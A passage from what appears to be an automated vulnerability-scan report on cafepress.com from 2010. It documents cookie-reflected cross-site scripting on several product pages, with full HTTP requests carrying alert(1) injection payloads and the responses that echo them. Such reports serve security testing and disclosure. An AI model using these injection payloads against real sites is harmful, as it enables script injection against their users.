__utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b1f9d</script><script>alert(1)</script>c7da687b934 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW17 Cteonnt-Length: 93236 Date: Sun, 26 Dec 2010 13:46:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/ Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:56 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 93236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]... 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'ProductDetails' window.cafepress.tealeaf.searchTerm = 'b1f9d</script><script>alert(1)</script>c7da687b934 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.8. http://www.cafepress.com/+aprons [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f815"-alert(1)-"690539d6541 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+aprons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 60358 Date: Sun, 26 Dec 2010 13:47:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/ Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60358 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA7f815"-alert(1)-"690539d6541 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.9. http://www.cafepress.com/+aprons [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+aprons
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87e97</script><script>alert(1)</script>edc3d2d6805 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+aprons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=87e97</script><script>alert(1)</script>edc3d2d6805 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 60380 Date: Sun, 26 Dec 2010 13:47:16 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 60380 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '87e97</script><script>alert(1)</script>edc3d2d6805 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.10. http://www.cafepress.com/+baby-blanket [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-blanket
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60566"-alert(1)-"db88db638f9 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 58705 Date: Sun, 26 Dec 2010 13:47:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:15 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58705 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA60566"-alert(1)-"db88db638f9 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.11. http://www.cafepress.com/+baby-blanket [cp_st cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-blanket
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b770e</script><script>alert(1)</script>35f226fbd0 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=b770e</script><script>alert(1)</script>35f226fbd0 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW16 Cteonnt-Length: 58721 Date: Sun, 26 Dec 2010 13:47:13 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/ Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:13 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 58721 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'b770e</script><script>alert(1)</script>35f226fbd0 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'OMM' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.12. http://www.cafepress.com/+baby-bodysuits [cp-v cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+baby-bodysuits
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd70c"-alert(1)-"1bb61056447 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+baby-bodysuits HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAdd70c"-alert(1)-"1bb61056447 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
